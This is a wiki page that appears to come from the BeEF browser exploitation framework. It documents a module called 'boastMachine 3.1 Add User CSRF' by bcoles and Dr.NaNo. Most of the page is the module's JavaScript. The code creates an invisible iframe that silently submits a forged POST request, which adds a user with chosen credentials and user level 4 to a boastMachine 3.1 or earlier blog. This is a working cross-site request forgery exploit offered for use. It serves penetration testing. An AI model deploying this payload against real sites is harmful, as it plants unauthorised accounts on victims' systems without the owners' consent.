-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: boastMachine 3.1 Add User CSRF
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: add a user to a boastMachine <= 3.1 install
-
Authors: bcoles, Dr.NaNo
-
Browsers: All
Uses an invisible iframe with a POST request to add a user
var base = '<%= @base %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var email = '<%= @email %>';
var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", "application/x-www-form-urlencoded", [
{'type':'hidden', 'name':'action', 'value':'add_user'},
{'type':'hidden', 'name':'do', 'value':'add'},
{'type':'hidden', 'name':'user_login', 'value':username},
{'type':'hidden', 'name':'user_pass', 'value':password},
{'type':'hidden', 'name':'user_name', 'value':username},
{'type':'hidden', 'name':'user_email', 'value':email},
{'type':'hidden', 'name':'blogs[]', 'value':'4'},
{'type':'hidden', 'name':'user_level', 'value':'4'},
]);- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK